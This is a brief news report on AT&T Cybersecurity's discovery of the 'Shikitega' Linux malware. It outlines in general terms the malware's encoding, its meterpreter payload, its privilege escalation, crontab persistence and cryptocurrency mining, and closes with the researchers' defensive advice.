AT&T outs new 'Shikitega' Linux malware

Researchers at AT&T Cybersecurity say they have found new malware that attacks networked hosts and IoT devices that run Linux-based operating systems.

AT&T has named the malware "Shikitega" after finding that it uses the Shikata Ga Nai polymorphic XOR additive feedback encoder from the security penetration testing tool Metasploit, to hide its malicious functionality from anti-virus scans.

After performing multiple decoding loops on a very small executable and linkable format program, just 300 bytes in size, Shikitega fetches the Mettle Metasploit meterpreter, developed by security vendor Rapid7.

Meterpreters are attack payloads that provide interactive command shells to explore and fully exploit and control target systems.

Another ELF binary executes shell commands and addditional files, the researchers said.

Files downloaded with this last stage dropper exploits two Linux privilege escalation bugs to obtain root superuser privileges.

One of the vulnerabilities, named PwnKit by Qualys, lay undetected in Linux for 12 years.

Shikitega adds itself to the system crontab task scheduler, with root privileges, for persistence, and proceeds to download and run the XMRig Monery pseudo-anonymous crypto currency miner.

The malware also uses cloud systems to host command and control servers, AT&T said.

AT&T did not specify which endpoint hosts and IoT systems the malware specifically targets, but advised users to update their software and run an anti-virus, and to backup system and server files.